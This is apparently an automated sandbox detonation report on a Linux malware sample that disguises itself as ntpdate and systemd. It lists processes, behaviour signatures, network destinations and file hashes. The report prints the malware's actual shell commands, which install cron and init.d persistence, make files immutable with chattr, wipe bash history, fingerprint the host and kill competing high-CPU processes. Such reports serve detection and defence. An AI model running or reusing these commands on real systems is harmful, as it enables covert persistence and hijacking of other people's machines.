Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf .i686]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 89.187.167.38:443 | tcp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
130s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/bsysde | /bin/cp | N/A |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/bsysdl | /bin/cp | N/A |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/binitd | /bin/cp | N/A |
| File opened for modification | /sbin/bcrond | /bin/cp | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 89.187.167.3:443 | tcp |
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/sbin/bcrond
| MD5 | 92dc30d449f563a5bdbba08d4a9d57fc |
| SHA1 | ff609eed2df786396203a8806400566df079cc7f |
| SHA256 | 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b |
| SHA512 | 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097 |
/etc/cron.d/ntpdate
| MD5 | 755700d11d59e0daeb4f6452aee1ad5d |
| SHA1 | 6b1194921376bef9c7559629712772a11e78eaa4 |
| SHA256 | 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00 |
| SHA512 | 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7 |
/sbin/entpdate
| MD5 | 4aeb6335d69473274691f59dc2096cfe |
| SHA1 | 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc |
| SHA256 | 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785 |
| SHA512 | 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c |
/sbin/lntpdate
| MD5 | 3748e897538baafbc7b260b4d2fbc98f |
| SHA1 | 41d179e3cfc4c1820ea2c0fed0d50009564db79b |
| SHA256 | ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7 |
| SHA512 | 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea |
/etc/init.d/ntpdate
| MD5 | bd99a962d94b5b4c32f8b7c8ca1f9ea9 |
| SHA1 | af33dc04d1f16e5ccceb2c0569b26e45bb65b32b |
| SHA256 | 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28 |
| SHA512 | fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa |
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
149s
Max time network
134s
Command Line
Signatures
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | /tmp/.update/.i686 | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.6m5OSD | /usr/bin/crontab | N/A |
Enumerates running processes
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/board_name | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_serial | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_date | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_serial | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | /tmp/.update/.i686 | N/A |
Security Software Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
| File opened for reading | /proc/cpuinfo | /tmp/.update/.i686 | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/cpu/types | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/dax/devices/target_node | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/meminfo | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/node/online | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/DMI | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/cpumap | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/dax/target_node | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/smbios_entry_point | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/fs/cgroup/unified/cgroup.controllers | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset/cpuset.mems | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/physical_package_id | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset/cpuset.cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/die_cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_latency | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_id | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/package_cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/dax/devices | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access1/initiators | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_bandwidth | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id | /tmp/.update/.i686 | N/A |
Process Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/ps | N/A |
| N/A | N/A | /usr/bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/565/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/787/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/15/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/455/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/85/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/89/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/495/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/444/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/962/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1342/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/87/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/175/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1349/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/443/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/20/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/558/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1349/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1328/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/79/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/169/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1068/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/87/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/91/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1068/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1333/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/164/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/457/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1039/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1397/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/7/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1398/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/868/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/500/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/558/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1138/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/169/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/693/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/876/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/91/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1097/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/90/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/813/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/159/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1465/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/444/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/962/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/676/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/86/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/681/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/171/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/272/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/77/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/693/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1162/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1366/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1097/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1336/cmdline | /usr/bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/.cron | /bin/sh | N/A |
| File opened for modification | /tmp/.lock | /tmp/.update/.i686 | N/A |
Processes
/tmp/.update/.i686
[/tmp/.update/.i686]
/bin/sh
[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]
/usr/bin/hostname
[hostname -I]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print "-"$2}]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep Port ]
/usr/bin/cat
[cat /etc/ssh/sshd_config]
/usr/bin/whoami
[whoami]
/usr/bin/hostname
[hostname]
/usr/bin/grep
[grep -c ^processor /proc/cpuinfo]
/usr/bin/sed
[sed -e s/$//]
/usr/bin/sed
[sed -e s/^ *//]
/usr/bin/cut
[cut -d: -f2]
/usr/bin/grep
[grep -m 1 model name /proc/cpuinfo]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $4}]
/bin/sh
[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/awk
[awk /[zZ]/ && !a[$2]++ {print $2}]
/usr/bin/ps
[ps -A -ostat,ppid]
/usr/bin/id
[id -u]
/usr/bin/grep
[grep -v grep]
/usr/bin/grep
[grep /etc/cron]
/usr/bin/ps
[ps x]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/id
[id -u]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -v /usr/sbin/httpd]
/usr/bin/grep
[grep -v -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
/bin/sh
[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/usr/bin/grep
[grep -v grep]
/usr/bin/crontab
[crontab -l]
/usr/bin/grep
[grep -v /tmp/.update/.i686]
/usr/bin/grep
[grep /tmp/.update/.i686$]
/usr/bin/grep
[grep -v grep]
/usr/bin/uniq
[uniq]
/usr/bin/crontab
[crontab -l]
/usr/bin/wc
[wc -l]
/usr/bin/sort
[sort]
/usr/bin/crontab
[crontab /tmp/.update/.cron]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/bin/sh
